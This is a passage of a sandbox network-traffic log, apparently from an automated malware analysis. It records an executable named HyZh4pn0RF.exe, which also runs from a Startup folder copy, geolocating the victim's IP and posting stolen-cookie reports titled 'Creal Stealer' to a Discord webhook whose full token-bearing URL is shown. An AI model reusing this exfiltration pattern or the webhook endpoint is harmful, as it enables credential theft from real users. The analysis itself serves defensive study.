2024-09-27 16:19:00 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 30 4e 30 47 71 65 4c 46 38 49 4d 6b 65 33 5a 6c 4d 56 30 4c 73 50 73 65 62 75 56 55 35 76 4c 4b 67 70 39 6a 73 59 79 30 6b 49 45 2d 31 37 32 37 34 35 33 39 34 30 34 31 36 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 31 37 32 64 32 61 37 38 65 32 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=0N0GqeLF8IMke3ZlMV0LsPsebuVU5vLKgp9jsYy0kIE-1727453940416-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd0172d2a78e2-EWR
2024-09-27 16:19:00 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.8	49740	162.159.136.232	443	4040	C:\Users\user\Desktop\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:00 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 647 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:00 UTC	647	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 43 6f 6f 6b 69 65 73 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 3a 2a 2a 5c 6e 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 3a 63 6f 6f 6b 69 65 73 5f 74 6c 6d 3a 38 31 36 36 31 39 30 36 33 36 31 38 35 36 38 32 33 34 3e 20 5c 75 32 30 32 32 20 2a 2a 32 2a 2a 20 43 6f 6f 6b 69 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal \| Cookies Stealer", "description": "<:apollondelirmis:1012370180845883493>: Accounts:\n\n\n\nData:\n<:cookies_tlm:816619063618568234> \u2022 2 Cooki
2024-09-27 16:19:01 UTC	1331	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:19:01 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=34bf85b87cec11efb41b16ad33b060f2; Expires=Wed, 26-Sep-2029 16:19:01 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1727453942 x-ratelimit-reset-after: 1 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jDmJdrMNV2xiJYzH2lNiDU3R8dCJjfGmlMoVL9FYDsu5amF4pHIxWZJjTtELnaGaMZWwHEA2FMPI2WIHbyAdLscMxY3U4KWklJCHvn4OZhDk2DreENz3p85d%2BJDA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=34bf85b87cec11efb41b16ad33b060f2b95a6d5062626dde94c14e84002967a5fb0b075e1e482e91ac2d49e42de876ee; Expires=Wed, 26-Sep-2029 16:19:01 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=fbe7f0d857c54826245c4e0cf497aa483d23d881-1727453941; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:19:01 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 64 68 53 39 67 6b 58 35 76 78 52 38 4b 48 59 47 56 77 52 48 59 6e 74 4c 45 32 79 33 50 75 78 46 77 74 58 64 51 71 49 36 78 78 38 2d 31 37 32 37 34 35 33 39 34 31 31 30 30 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 31 62 34 62 31 63 34 33 39 61 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=dhS9gkX5vxR8KHYGVwRHYntLE2y3PuxFwtXdQqI6xx8-1727453941100-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd01b4b1c439a-EWR
2024-09-27 16:19:01 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.8	49741	162.159.136.232	443	4040	C:\Users\user\Desktop\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:01 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 647 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:01 UTC	647	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 43 6f 6f 6b 69 65 73 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 3a 2a 2a 5c 6e 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 3a 63 6f 6f 6b 69 65 73 5f 74 6c 6d 3a 38 31 36 36 31 39 30 36 33 36 31 38 35 36 38 32 33 34 3e 20 5c 75 32 30 32 32 20 2a 2a 32 2a 2a 20 43 6f 6f 6b 69 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal \| Cookies Stealer", "description": "<:apollondelirmis:1012370180845883493>: Accounts:\n\n\n\nData:\n<:cookies_tlm:816619063618568234> \u2022 2 Cooki
2024-09-27 16:19:01 UTC	1335	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:19:01 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=3534f97e7cec11ef93886a726fe7a83e; Expires=Wed, 26-Sep-2029 16:19:01 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1727453943 x-ratelimit-reset-after: 1 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cRk6kaTaqqq5uXKTyOTn7IDbhJ5cFsLSEk01TjECb4HNyXfPUhfoY%2BJVdEAKutQc%2BC07B0Z8NTq6WgGfiEtxF3soYpk6UeT36fjAy%2BkoSAgofzpPYxGek87BJAro"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=3534f97e7cec11ef93886a726fe7a83e1c137929250cb519ca8b91474352381d171f4301648df8ec637c694a9b75e94a; Expires=Wed, 26-Sep-2029 16:19:01 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=fbe7f0d857c54826245c4e0cf497aa483d23d881-1727453941; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:19:01 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 41 57 64 58 4b 48 6f 72 75 6a 4f 59 47 6b 78 45 4c 51 34 35 5f 42 59 4b 78 7a 67 70 30 64 64 6e 4a 65 7a 33 30 72 6e 4c 73 57 30 2d 31 37 32 37 34 35 33 39 34 31 38 36 39 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 32 30 33 63 36 62 63 33 34 33 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=AWdXKHorujOYGkxELQ45_BYKxzgp0ddnJez30rnLsW0-1727453941869-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd0203c6bc343-EWR
2024-09-27 16:19:01 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.8	49742	162.159.136.232	443	4040	C:\Users\user\Desktop\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:02 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 647 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:02 UTC	647	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 43 6f 6f 6b 69 65 73 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 3a 2a 2a 5c 6e 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 3a 63 6f 6f 6b 69 65 73 5f 74 6c 6d 3a 38 31 36 36 31 39 30 36 33 36 31 38 35 36 38 32 33 34 3e 20 5c 75 32 30 32 32 20 2a 2a 32 2a 2a 20 43 6f 6f 6b 69 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal \| Cookies Stealer", "description": "<:apollondelirmis:1012370180845883493>: Accounts:\n\n\n\nData:\n<:cookies_tlm:816619063618568234> \u2022 2 Cooki
2024-09-27 16:19:02 UTC	1335	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:19:02 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=35a295427cec11ef91f2bee3f8a49ee5; Expires=Wed, 26-Sep-2029 16:19:02 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1727453943 x-ratelimit-reset-after: 1 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xRWE2%2FbkJRY5CBVvGAMXY%2FfawRRtG%2B174oxnlApwpmKo6LvcPf95SgqnIYPVEYpGFzc6Z4p6hePoiEefq3q09GrVs4NdN0OEnXqTNxpRfM8orrA0tbuT62MRMYBv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=35a295427cec11ef91f2bee3f8a49ee5d8d0e84959a2381178676574c1aca333daa355925bb8caffbdcc127a490ba9d7; Expires=Wed, 26-Sep-2029 16:19:02 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=c706bff95cf2f6ea15d8fa6873914924c3ad57a1-1727453942; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:19:02 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 55 39 2e 6f 44 5a 79 72 74 45 7a 59 62 37 55 38 45 37 75 6b 2e 32 76 73 68 39 73 39 69 50 45 4c 32 70 5f 4d 6b 63 39 48 35 6e 38 2d 31 37 32 37 34 35 33 39 34 32 35 38 38 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 32 34 36 39 39 31 35 65 37 63 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=U9.oDZyrtEzYb7U8E7uk.2vsh9s9iPEL2p_Mkc9H5n8-1727453942588-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd02469915e7c-EWR
2024-09-27 16:19:02 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.8	49743	172.67.74.152	443	5340	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:02 UTC	117	OUT	GET / HTTP/1.1 Accept-Encoding: identity Host: api.ipify.org User-Agent: Python-urllib/3.12 Connection: close
2024-09-27 16:19:02 UTC	211	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 16:19:02 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8c9cd026ce761a2c-EWR
2024-09-27 16:19:02 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.8	49746	172.67.74.152	443	4040	C:\Users\user\Desktop\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:03 UTC	117	OUT	GET / HTTP/1.1 Accept-Encoding: identity Host: api.ipify.org User-Agent: Python-urllib/3.12 Connection: close
2024-09-27 16:19:03 UTC	211	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 16:19:03 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8c9cd02b6f2442ef-EWR
2024-09-27 16:19:03 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.8	49745	159.89.102.253	443	5340	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:03 UTC	139	OUT	GET /jsonp/8.46.123.33 HTTP/1.1 Accept-Encoding: identity Host: geolocation-db.com User-Agent: Python-urllib/3.12 Connection: close
2024-09-27 16:19:03 UTC	206	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Fri, 27 Sep 2024 16:19:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: *
2024-09-27 16:19:03 UTC	171	IN	Data Raw: 61 30 0d 0a 63 61 6c 6c 62 61 63 6b 28 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 69 74 79 22 3a 6e 75 6c 6c 2c 22 70 6f 73 74 61 6c 22 3a 6e 75 6c 6c 2c 22 6c 61 74 69 74 75 64 65 22 3a 33 37 2e 37 35 31 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 39 37 2e 38 32 32 2c 22 49 50 76 34 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 73 74 61 74 65 22 3a 6e 75 6c 6c 7d 29 0d 0a 30 0d 0a 0d 0a Data Ascii: a0callback({"country_code":"US","country_name":"United States","city":null,"postal":null,"latitude":37.751,"longitude":-97.822,"IPv4":"8.46.123.33","state":null})0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.8	49748	162.159.136.232	443	5340	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:04 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 431 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:04 UTC	431	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 5a 69 70 73 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 43 72 65 61 6c 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 41 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal Zips", "description": "\n\n", "color": 2895667, "footer": {"text": "Creal Stealer \| https://t.me/CrealStealer", "icon_url": "https://raw.githubusercontent.com/A
2024-09-27 16:19:04 UTC	1339	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:19:04 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=36d953d87cec11efb2b57e7726d028ec; Expires=Wed, 26-Sep-2029 16:19:04 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1727453946 x-ratelimit-reset-after: 1 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x%2BLVaQmZS2Sc3Ef9Brfygf%2FLqkF6%2Fvon5MjZ65z4vlAicTKRzU6zDJ3HPkmqt0IG%2B3VVqG6xQ%2BjBu7AKHb8I3laRIWQ9LrPECDeecIKtvuWl3nE4B1mFOTcajhLQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=36d953d87cec11efb2b57e7726d028ecf197d44e174edb94b72f5026d3879ad6f2483b00dc1582840d93ff3c0e1a2a6c; Expires=Wed, 26-Sep-2029 16:19:04 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=eec4d8ba3fc34a38b5d32968d39e8cb613742df2-1727453944; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:19:04 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 5f 56 56 53 75 69 70 52 4f 6a 4e 34 41 54 63 51 5f 61 35 39 34 63 4c 42 53 4f 68 67 44 32 63 52 6e 34 2e 34 4a 64 55 52 52 35 41 2d 31 37 32 37 34 35 33 39 34 34 36 32 37 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 33 31 38 62 36 30 38 63 36 63 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=_VVSuipROjN4ATcQ_a594cLBSOhgD2cRn4.4JdURR5A-1727453944627-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd0318b608c6c-EWR
2024-09-27 16:19:04 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.8	49747	159.89.102.253	443	4040	C:\Users\user\Desktop\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:04 UTC	139	OUT	GET /jsonp/8.46.123.33 HTTP/1.1 Accept-Encoding: identity Host: geolocation-db.com User-Agent: Python-urllib/3.12 Connection: close
2024-09-27 16:19:04 UTC	206	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Fri, 27 Sep 2024 16:19:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: *
2024-09-27 16:19:04 UTC	171	IN	Data Raw: 61 30 0d 0a 63 61 6c 6c 62 61 63 6b 28 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 69 74 79 22 3a 6e 75 6c 6c 2c 22 70 6f 73 74 61 6c 22 3a 6e 75 6c 6c 2c 22 6c 61 74 69 74 75 64 65 22 3a 33 37 2e 37 35 31 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 39 37 2e 38 32 32 2c 22 49 50 76 34 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 73 74 61 74 65 22 3a 6e 75 6c 6c 7d 29 0d 0a 30 0d 0a 0d 0a Data Ascii: a0callback({"country_code":"US","country_name":"United States","city":null,"postal":null,"latitude":37.751,"longitude":-97.822,"IPv4":"8.46.123.33","state":null})0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.8	49749	172.67.74.152	443	5340	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:05 UTC	117	OUT	GET / HTTP/1.1 Accept-Encoding: identity Host: api.ipify.org User-Agent: Python-urllib/3.12 Connection: close
2024-09-27 16:19:05 UTC	211	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 16:19:05 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8c9cd0356db18c65-EWR
2024-09-27 16:19:05 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.8	49750	162.159.136.232	443	5340	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
